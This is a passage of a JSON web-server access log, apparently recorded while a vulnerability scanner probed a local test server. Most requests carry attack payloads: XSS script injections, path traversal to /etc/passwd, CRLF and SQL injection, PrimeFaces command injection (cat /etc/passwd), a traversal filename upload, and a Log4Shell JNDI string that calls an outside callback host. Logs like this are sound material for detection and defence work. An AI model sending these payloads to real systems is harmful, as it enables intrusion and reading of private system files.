+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/downmix.inc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /responsiveUI/webmail/folder.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=cat /etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlrpc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/users/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/weathermap/configs/poc.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/setup-config.php?step=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ueditor/php/getRemoteImage.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=type C:\x5C\x5CWindows\x5C\x5Cwin.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"------WebKitFormBoundaryoZ8meKnrrso89R6Y\x0D\x0AContent-Disposition: form-data; name=\x22jarfile\x22; filename=\x22../../../../../../../tmp/poc\x22\x0D\x0A\x0D\x0Atest-poc\x0D\x0A------WebKitFormBoundaryoZ8meKnrrso89R6Y--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jars/upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /get_dkey.php?user=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rest_route=/wp/v2/users/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prweb/PRAuth/app/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.initial.sql HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web_shell_cmd.gch HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"{\x22username\x22:\x22user\x22,\x22password\x22:\x22pass\x22,\x22remember\x22:\x22${jndi:ldap://${hostName}.c9v8gc8smpv8b0ng0t005nmjagwkk94eq.oast.online}\x22,\x22strict\x22:true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1/manage/account/login?redirect=%2Fmanage", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc 